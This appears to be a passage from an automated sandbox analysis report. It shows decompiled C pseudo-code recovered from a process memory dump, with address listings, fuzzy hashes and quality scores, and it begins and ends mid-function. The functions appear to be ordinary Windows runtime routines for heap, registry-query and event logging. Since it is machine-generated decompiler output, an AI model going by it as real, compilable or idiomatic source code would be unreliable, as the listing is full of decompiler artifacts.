                        					_t72 =  *0x2c87b9c; // 0x0
                        					_t74 = L02BB4620(_t107, _t107, _t72 + 0x180000, _t121);
                        					_v1064 = _t74;
                        					__eflags = _t74;
                        					if(_t74 == 0) {
                        						goto L60;
                        					}
                        					_t102 = _t74;
                        					_push( &_v1060);
                        					_push(_t121);
                        					_push(_t74);
                        					_push(2);
                        					_push( &_v1048);
                        					_push(_t116);
                        					_t122 = E02BD9650();
                        					__eflags = _t122;
                        					if(_t122 >= 0) {
                        						L7:
                        						_t114 = _a12;
                        						__eflags = _t114;
                        						if(_t114 != 0) {
                        							_t77 = _a20;
                        							L26:
                        							_t109 =  *(_t102 + 4);
                        							__eflags = _t109 - 3;
                        							if(_t109 == 3) {
                        								L55:
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									L59:
                        									_t122 = 0xc0000024;
                        									L15:
                        									_t78 = _v1052;
                        									__eflags = _t78;
                        									if(_t78 != 0) {
                        										L02BB77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                        									}
                        									_t68 = _t122;
                        									goto L4;
                        								}
                        								_t110 = _v1056;
                        								_t118 =  *((intOrPtr*)(_t102 + 8));
                        								_v1060 = _t118;
                        								__eflags = _t110;
                        								if(_t110 == 0) {
                        									L10:
                        									_t122 = 0x80000005;
                        									L11:
                        									_t81 = _v1040;
                        									__eflags = _t81;
                        									if(_t81 == 0) {
                        										goto L15;
                        									}
                        									__eflags = _t122;
                        									if(_t122 >= 0) {
                        										L14:
                        										 *_t81 = _t118;
                        										goto L15;
                        									}
                        									__eflags = _t122 - 0x80000005;
                        									if(_t122 != 0x80000005) {
                        										goto L15;
                        									}
                        									goto L14;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                        								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                        									goto L10;
                        								}
                        								_push( *((intOrPtr*)(_t102 + 8)));
                        								_t59 = _t102 + 0xc; // 0xc
                        								_push(_t110);
                        								L54:
                        								E02BDF3E0();
                        								_t125 = _t125 + 0xc;
                        								goto L11;
                        							}
                        							__eflags = _t109 - 7;
                        							if(_t109 == 7) {
                        								goto L55;
                        							}
                        							_t118 = 4;
                        							__eflags = _t109 - _t118;
                        							if(_t109 != _t118) {
                        								__eflags = _t109 - 0xb;
                        								if(_t109 != 0xb) {
                        									__eflags = _t109 - 1;
                        									if(_t109 == 1) {
                        										__eflags = _t114 - _t118;
                        										if(_t114 != _t118) {
                        											_t118 =  *((intOrPtr*)(_t102 + 8));
                        											_v1060 = _t118;
                        											__eflags = _t118 - _t77;
                        											if(_t118 > _t77) {
                        												goto L10;
                        											}
                        											_push(_t118);
                        											_t56 = _t102 + 0xc; // 0xc
                        											_push(_v1056);
                        											goto L54;
                        										}
                        										__eflags = _t77 - _t118;
                        										if(_t77 != _t118) {
                        											L34:
                        											_t122 = 0xc0000004;
                        											goto L15;
                        										}
                        										_t111 = _v1056;
                        										__eflags = _t111 & 0x00000003;
                        										if((_t111 & 0x00000003) == 0) {
                        											_v1060 = _t118;
                        											__eflags = _t111;
                        											if(__eflags == 0) {
                        												goto L10;
                        											}
                        											_t42 = _t102 + 0xc; // 0xc
                        											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                        											_v1048 =  *((intOrPtr*)(_t102 + 8));
                        											_push(_t111);
                        											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                        											_push(0);
                        											_push( &_v1048);
                        											_t122 = E02BD13C0(_t102, _t118, _t122, __eflags);
                        											L44:
                        											_t118 = _v1072;
                        											goto L11;
                        										}
                        										_t122 = 0x80000002;
                        										goto L15;
                        									}
                        									_t122 = 0xc0000024;
                        									goto L44;
                        								}
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									goto L59;
                        								}
                        								_t118 = 8;
                        								__eflags = _t77 - _t118;
                        								if(_t77 != _t118) {
                        									goto L34;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        									goto L34;
                        								}
                        								_t112 = _v1056;
                        								_v1060 = _t118;
                        								__eflags = _t112;
                        								if(_t112 == 0) {
                        									goto L10;
                        								}
                        								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                        								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                        								goto L11;
                        							}
                        							__eflags = _t114 - _t118;
                        							if(_t114 != _t118) {
                        								goto L59;
                        							}
                        							__eflags = _t77 - _t118;
                        							if(_t77 != _t118) {
                        								goto L34;
                        							}
                        							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        								goto L34;
                        							}
                        							_t113 = _v1056;
                        							_v1060 = _t118;
                        							__eflags = _t113;
                        							if(_t113 == 0) {
                        								goto L10;
                        							}
                        							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                        							goto L11;
                        						}
                        						_t118 =  *((intOrPtr*)(_t102 + 8));
                        						__eflags = _t118 - _a20;
                        						if(_t118 <= _a20) {
                        							_t114 =  *(_t102 + 4);
                        							_t77 = _t118;
                        							goto L26;
                        						}
                        						_v1060 = _t118;
                        						goto L10;
                        					}
                        					__eflags = _t122 - 0x80000005;
                        					if(_t122 != 0x80000005) {
                        						goto L15;
                        					}
                        					L02BB77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                        					L18:
                        					_t121 = _v1060;
                        					goto L19;
                        				}
                        				_push( &_v1060);
                        				_push(0x400);
                        				_t102 =  &_v1036;
                        				_push(_t102);
                        				_push(2);
                        				_push( &_v1048);
                        				_push(_t116);
                        				_t122 = E02BD9650();
                        				if(_t122 >= 0) {
                        					__eflags = 0;
                        					_v1052 = 0;
                        					goto L7;
                        				}
                        				if(_t122 == 0x80000005) {
                        					goto L18;
                        				}
                        				goto L4;
                        			}










































                        0x02b9c608
                        0x02b9c615
                        0x02b9c625
                        0x02b9c62d
                        0x02b9c635
                        0x02b9c640
                        0x02b9c680
                        0x02b9c687
                        0x02b9c688
                        0x02b9c689
                        0x02b9c694
                        0x02b9c694
                        0x02b9c642
                        0x02b9c64a
                        0x02b9c697
                        0x02c07a25
                        0x02c07a2b
                        0x02c07a2e
                        0x02c07a30
                        0x02c07bea
                        0x02c07bea
                        0x00000000
                        0x02c07bea
                        0x02c07a36
                        0x02c07a43
                        0x02c07a48
                        0x02c07a4c
                        0x02c07a4e
                        0x00000000
                        0x00000000
                        0x02c07a58
                        0x02c07a5a
                        0x02c07a5b
                        0x02c07a5c
                        0x02c07a5d
                        0x02c07a63
                        0x02c07a64
                        0x02c07a6a
                        0x02c07a6c
                        0x02c07a6e
                        0x02c079cb
                        0x02c079cb
                        0x02c079ce
                        0x02c079d0
                        0x02c07a98
                        0x02c07a9b
                        0x02c07a9b
                        0x02c07a9e
                        0x02c07aa1
                        0x02c07bbe
                        0x02c07bbe
                        0x02c07bc0
                        0x02c07be0
                        0x02c07be0
                        0x02c07a01
                        0x02c07a01
                        0x02c07a05
                        0x02c07a07
                        0x02c07a15
                        0x02c07a15
                        0x02c07a1a
                        0x00000000
                        0x02c07a1a
                        0x02c07bc2
                        0x02c07bc6
                        0x02c07bc9
                        0x02c07bcd
                        0x02c07bcf
                        0x02c079e6
                        0x02c079e6
                        0x02c079eb
                        0x02c079eb
                        0x02c079ef
                        0x02c079f1
                        0x00000000
                        0x00000000
                        0x02c079f3
                        0x02c079f5
                        0x02c079ff
                        0x02c079ff
                        0x00000000
                        0x02c079ff
                        0x02c079f7
                        0x02c079fd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c079fd
                        0x02c07bd5
                        0x02c07bd8
                        0x00000000
                        0x00000000
                        0x02c07ba9
                        0x02c07bac
                        0x02c07bb0
                        0x02c07bb1
                        0x02c07bb1
                        0x02c07bb6
                        0x00000000
                        0x02c07bb6
                        0x02c07aa7
                        0x02c07aaa
                        0x00000000
                        0x00000000
                        0x02c07ab2
                        0x02c07ab3
                        0x02c07ab5
                        0x02c07aec
                        0x02c07aef
                        0x02c07b25
                        0x02c07b28
                        0x02c07b62
                        0x02c07b64
                        0x02c07b8f
                        0x02c07b92
                        0x02c07b96
                        0x02c07b98
                        0x00000000
                        0x00000000
                        0x02c07b9e
                        0x02c07b9f
                        0x02c07ba3
                        0x00000000
                        0x02c07ba3
                        0x02c07b66
                        0x02c07b68
                        0x02c07ae2
                        0x02c07ae2
                        0x00000000
                        0x02c07ae2
                        0x02c07b6e
                        0x02c07b72
                        0x02c07b75
                        0x02c07b81
                        0x02c07b85
                        0x02c07b87
                        0x00000000
                        0x00000000
                        0x02c07b31
                        0x02c07b34
                        0x02c07b3c
                        0x02c07b45
                        0x02c07b46
                        0x02c07b4f
                        0x02c07b51
                        0x02c07b57
                        0x02c07b59
                        0x02c07b59
                        0x00000000
                        0x02c07b59
                        0x02c07b77
                        0x00000000
                        0x02c07b77
                        0x02c07b2a
                        0x00000000
                        0x02c07b2a
                        0x02c07af1
                        0x02c07af3
                        0x00000000
                        0x00000000
                        0x02c07afb
                        0x02c07afc
                        0x02c07afe
                        0x00000000
                        0x00000000
                        0x02c07b00
                        0x02c07b03
                        0x00000000
                        0x00000000
                        0x02c07b05
                        0x02c07b09
                        0x02c07b0d
                        0x02c07b0f
                        0x00000000
                        0x00000000
                        0x02c07b18
                        0x02c07b1d
                        0x00000000
                        0x02c07b1d
                        0x02c07ab7
                        0x02c07ab9
                        0x00000000
                        0x00000000
                        0x02c07abf
                        0x02c07ac1
                        0x00000000
                        0x00000000
                        0x02c07ac3
                        0x02c07ac6
                        0x00000000
                        0x00000000
                        0x02c07ac8
                        0x02c07acc
                        0x02c07ad0
                        0x02c07ad2
                        0x00000000
                        0x00000000
                        0x02c07adb
                        0x00000000
                        0x02c07adb
                        0x02c079d6
                        0x02c079d9
                        0x02c079dc
                        0x02c07a91
                        0x02c07a94
                        0x00000000
                        0x02c07a94
                        0x02c079e2
                        0x00000000
                        0x02c079e2
                        0x02c07a74
                        0x02c07a7a
                        0x00000000
                        0x00000000
                        0x02c07a8a
                        0x02c07a21
                        0x02c07a21
                        0x00000000
                        0x02c07a21
                        0x02b9c650
                        0x02b9c651
                        0x02b9c656
                        0x02b9c65c
                        0x02b9c65d
                        0x02b9c663
                        0x02b9c664
                        0x02b9c66a
                        0x02b9c66e
                        0x02c079c5
                        0x02c079c7
                        0x00000000
                        0x02c079c7
                        0x02b9c67a
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0289926317676a65d853dd0cc3bc058bec870af574047e6e1d2bd971d7d6c9f1
                        • Instruction ID: b4c2d18029c5e830e5e26832a046ec1f4e4345f87afdeb7894b984141f85a137
                        • Opcode Fuzzy Hash: 0289926317676a65d853dd0cc3bc058bec870af574047e6e1d2bd971d7d6c9f1
                        • Instruction Fuzzy Hash: 70818F75A442459BCB29CF15C8C0B7AF7A9FB88354F14496AED459B280D330FE49CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E02C2B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t80;
                        				signed int _t83;
                        				intOrPtr _t89;
                        				signed int _t92;
                        				signed char _t106;
                        				signed int* _t107;
                        				intOrPtr _t108;
                        				intOrPtr _t109;
                        				signed int _t114;
                        				void* _t115;
                        				void* _t117;
                        				void* _t119;
                        				void* _t122;
                        				signed int _t123;
                        				signed int* _t124;
                        
                        				_t106 = _a12;
                        				if((_t106 & 0xfffffffc) != 0) {
                        					return 0xc000000d;
                        				}
                        				if((_t106 & 0x00000002) != 0) {
                        					_t106 = _t106 | 0x00000001;
                        				}
                        				_t109 =  *0x2c87b9c; // 0x0
                        				_t124 = L02BB4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                        				if(_t124 != 0) {
                        					 *_t124 =  *_t124 & 0x00000000;
                        					_t124[1] = _t124[1] & 0x00000000;
                        					_t124[4] = _t124[4] & 0x00000000;
                        					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                        						L13:
                        						_push(_t124);
                        						if((_t106 & 0x00000002) != 0) {
                        							_push(0x200);
                        							_push(0x28);
                        							_push(0xffffffff);
                        							_t122 = E02BD9800();
                        							if(_t122 < 0) {
                        								L33:
                        								if((_t124[4] & 0x00000001) != 0) {
                        									_push(4);
                        									_t64 =  &(_t124[1]); // 0x4
                        									_t107 = _t64;
                        									_push(_t107);
                        									_push(5);
                        									_push(0xfffffffe);
                        									E02BD95B0();
                        									if( *_t107 != 0) {
                        										_push( *_t107);
                        										E02BD95D0();
                        									}
                        								}
                        								_push(_t124);
                        								_push(0);
                        								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        								L37:
                        								L02BB77F0();
                        								return _t122;
                        							}
                        							_t124[4] = _t124[4] | 0x00000002;
                        							L18:
                        							_t108 = _a8;
                        							_t29 =  &(_t124[0x105]); // 0x414
                        							_t80 = _t29;
                        							_t30 =  &(_t124[5]); // 0x14
                        							_t124[3] = _t80;
                        							_t123 = 0;
                        							_t124[2] = _t30;
                        							 *_t80 = _t108;
                        							if(_t108 == 0) {
                        								L21:
                        								_t112 = 0x400;
                        								_push( &_v8);
                        								_v8 = 0x400;
                        								_push(_t124[2]);
                        								_push(0x400);
                        								_push(_t124[3]);
                        								_push(0);
                        								_push( *_t124);
                        								_t122 = E02BD9910();
                        								if(_t122 != 0xc0000023) {
                        									L26:
                        									if(_t122 != 0x106) {
                        										L40:
                        										if(_t122 < 0) {
                        											L29:
                        											_t83 = _t124[2];
                        											if(_t83 != 0) {
                        												_t59 =  &(_t124[5]); // 0x14
                        												if(_t83 != _t59) {
                        													L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                        												}
                        											}
                        											_push( *_t124);
                        											E02BD95D0();
                        											goto L33;
                        										}
                        										 *_a16 = _t124;
                        										return 0;
                        									}
                        									if(_t108 != 1) {
                        										_t122 = 0;
                        										goto L40;
                        									}
                        									_t122 = 0xc0000061;
                        									goto L29;
                        								} else {
                        									goto L22;
                        								}
                        								while(1) {
                        									L22:
                        									_t89 =  *0x2c87b9c; // 0x0
                        									_t92 = L02BB4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                        									_t124[2] = _t92;
                        									if(_t92 == 0) {
                        										break;
                        									}
                        									_t112 =  &_v8;
                        									_push( &_v8);
                        									_push(_t92);
                        									_push(_v8);
                        									_push(_t124[3]);
                        									_push(0);
                        									_push( *_t124);
                        									_t122 = E02BD9910();
                        									if(_t122 != 0xc0000023) {
                        										goto L26;
                        									}
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                        								}
                        								_t122 = 0xc0000017;
                        								goto L26;
                        							}
                        							_t119 = 0;
                        							do {
                        								_t114 = _t124[3];
                        								_t119 = _t119 + 0xc;
                        								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                        								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                        								_t123 = _t123 + 1;
                        								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                        							} while (_t123 < _t108);
                        							goto L21;
                        						}
                        						_push(0x28);
                        						_push(3);
                        						_t122 = E02B9A7B0();
                        						if(_t122 < 0) {
                        							goto L33;
                        						}
                        						_t124[4] = _t124[4] | 0x00000001;
                        						goto L18;
                        					}
                        					if((_t106 & 0x00000001) == 0) {
                        						_t115 = 0x28;
                        						_t122 = E02C2E7D3(_t115, _t124);
                        						if(_t122 < 0) {
                        							L9:
                        							_push(_t124);
                        							_push(0);
                        							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        							goto L37;
                        						}
                        						L12:
                        						if( *_t124 != 0) {
                        							goto L18;
                        						}
                        						goto L13;
                        					}
                        					_t15 =  &(_t124[1]); // 0x4
                        					_t117 = 4;
                        					_t122 = E02C2E7D3(_t117, _t15);
                        					if(_t122 >= 0) {
                        						_t124[4] = _t124[4] | 0x00000001;
                        						_v12 = _v12 & 0x00000000;
                        						_push(4);
                        						_push( &_v12);
                        						_push(5);
                        						_push(0xfffffffe);
                        						E02BD95B0();
                        						goto L12;
                        					}
                        					goto L9;
                        				} else {
                        					return 0xc0000017;
                        				}
                        			}




















                        0x02c2b8d9
                        0x02c2b8e4
                        0x00000000
                        0x02c2b8e6
                        0x02c2b8f3
                        0x02c2b8f5
                        0x02c2b8f5
                        0x02c2b8f8
                        0x02c2b920
                        0x02c2b924
                        0x02c2b936
                        0x02c2b939
                        0x02c2b93d
                        0x02c2b948
                        0x02c2b9a0
                        0x02c2b9a0
                        0x02c2b9a4
                        0x02c2b9bf
                        0x02c2b9c4
                        0x02c2b9c6
                        0x02c2b9cd
                        0x02c2b9d1
                        0x02c2bad4
                        0x02c2bad8
                        0x02c2bada
                        0x02c2badc
                        0x02c2badc
                        0x02c2badf
                        0x02c2bae0
                        0x02c2bae2
                        0x02c2bae4
                        0x02c2baec
                        0x02c2baee
                        0x02c2baf0
                        0x02c2baf0
                        0x02c2baec
                        0x02c2bafb
                        0x02c2bafc
                        0x02c2bafe
                        0x02c2bb01
                        0x02c2bb01
                        0x00000000
                        0x02c2bb06
                        0x02c2b9d7
                        0x02c2b9db
                        0x02c2b9db
                        0x02c2b9de
                        0x02c2b9de
                        0x02c2b9e4
                        0x02c2b9e7
                        0x02c2b9ea
                        0x02c2b9ec
                        0x02c2b9ef
                        0x02c2b9f3
                        0x02c2ba1b
                        0x02c2ba1b
                        0x02c2ba23
                        0x02c2ba24
                        0x02c2ba27
                        0x02c2ba2a
                        0x02c2ba2b
                        0x02c2ba2e
                        0x02c2ba30
                        0x02c2ba37
                        0x02c2ba3f
                        0x02c2ba9c
                        0x02c2baa2
                        0x02c2bb13
                        0x02c2bb15
                        0x02c2baae
                        0x02c2baae
                        0x02c2bab3
                        0x02c2bab5
                        0x02c2baba
                        0x02c2bac8
                        0x02c2bac8
                        0x02c2baba
                        0x02c2bacd
                        0x02c2bacf
                        0x00000000
                        0x02c2bacf
                        0x02c2bb1a
                        0x00000000
                        0x02c2bb1c
                        0x02c2baa7
                        0x02c2bb11
                        0x00000000
                        0x02c2bb11
                        0x02c2baa9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c2ba41
                        0x02c2ba41
                        0x02c2ba41
                        0x02c2ba58
                        0x02c2ba5d
                        0x02c2ba62
                        0x00000000
                        0x00000000
                        0x02c2ba64
                        0x02c2ba67
                        0x02c2ba68
                        0x02c2ba69
                        0x02c2ba6c
                        0x02c2ba6f
                        0x02c2ba71
                        0x02c2ba78
                        0x02c2ba80
                        0x00000000
                        0x00000000
                        0x02c2ba90
                        0x02c2ba90
                        0x02c2ba97
                        0x00000000
                        0x02c2ba97
                        0x02c2b9f5
                        0x02c2b9f7
                        0x02c2b9f7
                        0x02c2b9fa
                        0x02c2ba03
                        0x02c2ba07
                        0x02c2ba0c
                        0x02c2ba10
                        0x02c2ba17
                        0x00000000
                        0x02c2b9f7
                        0x02c2b9a6
                        0x02c2b9a8
                        0x02c2b9af
                        0x02c2b9b3
                        0x00000000
                        0x00000000
                        0x02c2b9b9
                        0x00000000
                        0x02c2b9b9
                        0x02c2b94d
                        0x02c2b98f
                        0x02c2b995
                        0x02c2b999
                        0x02c2b960
                        0x02c2b967
                        0x02c2b968
                        0x02c2b96a
                        0x00000000
                        0x02c2b96a
                        0x02c2b99b
                        0x02c2b99e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c2b99e
                        0x02c2b951
                        0x02c2b954
                        0x02c2b95a
                        0x02c2b95e
                        0x02c2b972
                        0x02c2b979
                        0x02c2b97d
                        0x02c2b97f
                        0x02c2b980
                        0x02c2b982
                        0x02c2b984
                        0x00000000
                        0x02c2b984
                        0x00000000
                        0x02c2b926
                        0x00000000
                        0x02c2b926

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8967775d02f245f31e48d0a10135202f15bc5550503cf6c0444a5e1dfbcfca74
                        • Instruction ID: 8c7505af2989b7360103d959938ba710c34b705481b285865265b9c0fe599d7f
                        • Opcode Fuzzy Hash: 8967775d02f245f31e48d0a10135202f15bc5550503cf6c0444a5e1dfbcfca74
                        • Instruction Fuzzy Hash: 17711F32240B11EFD721DF25C844F66B7B6EF80728F144968E6559B2A0EF71EE48CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E02C16DC9(signed int __ecx, void* __edx) {
                        				unsigned int _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				char _v32;
                        				char _v36;
                        				char _v40;
                        				char _v44;
                        				char _v48;
                        				char _v52;
                        				char _v56;
                        				char _v60;
                        				void* _t87;
                        				void* _t95;
                        				signed char* _t96;
                        				signed int _t107;
                        				signed int _t136;
                        				signed char* _t137;
                        				void* _t157;
                        				void* _t161;
                        				void* _t167;
                        				intOrPtr _t168;
                        				void* _t174;
                        				void* _t175;
                        				signed int _t176;
                        				void* _t177;
                        
                        				_t136 = __ecx;
                        				_v44 = 0;
                        				_t167 = __edx;
                        				_v40 = 0;
                        				_v36 = 0;
                        				_v32 = 0;
                        				_v60 = 0;
                        				_v56 = 0;
                        				_v52 = 0;
                        				_v48 = 0;
                        				_v16 = __ecx;
                        				_t87 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                        				_t175 = _t87;
                        				if(_t175 != 0) {
                        					_t11 = _t175 + 0x30; // 0x30
                        					 *((short*)(_t175 + 6)) = 0x14d4;
                        					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                        					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                        					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                        					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                        					E02C16B4C(_t167, _t11, 0x214,  &_v8);
                        					_v12 = _v8 + 0x10;
                        					_t95 = E02BB7D50();
                        					_t137 = 0x7ffe0384;
                        					if(_t95 == 0) {
                        						_t96 = 0x7ffe0384;
                        					} else {
                        						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t175);
                        					_push(_v12);
                        					_push(0x402);
                        					_push( *_t96 & 0x000000ff);
                        					E02BD9AE0();
                        					_t87 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                        					_t176 = _v16;
                        					if((_t176 & 0x00000100) != 0) {
                        						_push( &_v36);
                        						_t157 = 4;
                        						_t87 = E02C1795D( *((intOrPtr*)(_t167 + 8)), _t157);
                        						if(_t87 >= 0) {
                        							_v24 = E02C1795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                        							_v28 = E02C1795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                        							_push( &_v52);
                        							_t161 = 5;
                        							_t168 = E02C1795D( *((intOrPtr*)(_t167 + 8)), _t161);
                        							_v20 = _t168;
                        							_t107 = L02BB4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                        							_v16 = _t107;
                        							if(_t107 != 0) {
                        								_v8 = _v8 & 0x00000000;
                        								 *(_t107 + 0x20) = _t176;
                        								 *((short*)(_t107 + 6)) = 0x14d5;
                        								_t47 = _t107 + 0x24; // 0x24
                        								_t177 = _t47;
                        								E02C16B4C( &_v36, _t177, 0xc78,  &_v8);
                        								_t51 = _v8 + 4; // 0x4
                        								_t178 = _t177 + (_v8 >> 1) * 2;
                        								_v12 = _t51;
                        								E02C16B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_v12 = _v12 + _v8;
                        								E02C16B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_t125 = _v8;
                        								_v12 = _v12 + _v8;
                        								E02C16B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                        								_t174 = _v12 + _v8;
                        								if(E02BB7D50() != 0) {
                        									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        								}
                        								_push(_v16);
                        								_push(_t174);
                        								_push(0x402);
                        								_push( *_t137 & 0x000000ff);
                        								E02BD9AE0();
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                        								_t168 = _v20;
                        							}
                        							_t87 = L02BB2400( &_v36);
                        							if(_v24 >= 0) {
                        								_t87 = L02BB2400( &_v44);
                        							}
                        							if(_t168 >= 0) {
                        								_t87 = L02BB2400( &_v52);
                        							}
                        							if(_v28 >= 0) {
                        								return L02BB2400( &_v60);
                        							}
                        						}
                        					}
                        				}
                        				return _t87;
                        			}































                        0x02c16dd4
                        0x02c16dde
                        0x02c16de1
                        0x02c16de3
                        0x02c16de6
                        0x02c16de9
                        0x02c16dec
                        0x02c16def
                        0x02c16df2
                        0x02c16df5
                        0x02c16dfe
                        0x02c16e04
                        0x02c16e09
                        0x02c16e0d
                        0x02c16e18
                        0x02c16e1b
                        0x02c16e22
                        0x02c16e2d
                        0x02c16e30
                        0x02c16e36
                        0x02c16e42
                        0x02c16e4d
                        0x02c16e50
                        0x02c16e55
                        0x02c16e5c
                        0x02c16e6e
                        0x02c16e5e
                        0x02c16e67
                        0x02c16e67
                        0x02c16e73
                        0x02c16e74
                        0x02c16e77
                        0x02c16e7c
                        0x02c16e7d
                        0x02c16e8e
                        0x02c16e93
                        0x02c16e9c
                        0x02c16ea8
                        0x02c16eab
                        0x02c16eac
                        0x02c16eb3
                        0x02c16ecd
                        0x02c16edc
                        0x02c16ee2
                        0x02c16ee5
                        0x02c16ef2
                        0x02c16efb
                        0x02c16f01
                        0x02c16f06
                        0x02c16f0b
                        0x02c16f11
                        0x02c16f1a
                        0x02c16f22
                        0x02c16f26
                        0x02c16f26
                        0x02c16f33
                        0x02c16f41
                        0x02c16f44
                        0x02c16f47
                        0x02c16f54
                        0x02c16f65
                        0x02c16f77
                        0x02c16f7c
                        0x02c16f82
                        0x02c16f91
                        0x02c16f99
                        0x02c16fa3
                        0x02c16fae
                        0x02c16fae
                        0x02c16fba
                        0x02c16fbb
                        0x02c16fbc
                        0x02c16fc1
                        0x02c16fc2
                        0x02c16fd3
                        0x02c16fd8
                        0x02c16fd8
                        0x02c16fdf
                        0x02c16fe8
                        0x02c16fee
                        0x02c16fee
                        0x02c16ff5
                        0x02c16ffb
                        0x02c16ffb
                        0x02c17004
                        0x00000000
                        0x02c1700a
                        0x02c17004
                        0x02c16eb3
                        0x02c16e9c
                        0x02c17015

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction ID: 1be61a4a3dc309ee289f5d3293a3ef74fe93567e8e4aac9c00cb64615f0406bd
                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction Fuzzy Hash: 0C717C71A00619EFCB11DFA5C984AEEFBB9FF88704F144069E505A7250DB30EA45EF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02B952A5(char __ecx) {
                        				char _v20;
                        				char _v28;
                        				char _v29;
                        				void* _v32;
                        				void* _v36;
                        				void* _v37;
                        				void* _v38;
                        				void* _v40;
                        				void* _v46;
                        				void* _v64;
                        				void* __ebx;
                        				intOrPtr* _t49;
                        				signed int _t53;
                        				short _t85;
                        				signed int _t87;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t101;
                        				intOrPtr* _t102;
                        				intOrPtr* _t104;
                        				signed int _t106;
                        				void* _t108;
                        
                        				_t93 = __ecx;
                        				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                        				_push(_t88);
                        				_v29 = __ecx;
                        				_t89 = _t88 | 0xffffffff;
                        				while(1) {
                        					E02BAEEF0(0x2c879a0);
                        					_t104 =  *0x2c88210; // 0x2732bd8
                        					if(_t104 == 0) {
                        						break;
                        					}
                        					asm("lock inc dword [esi]");
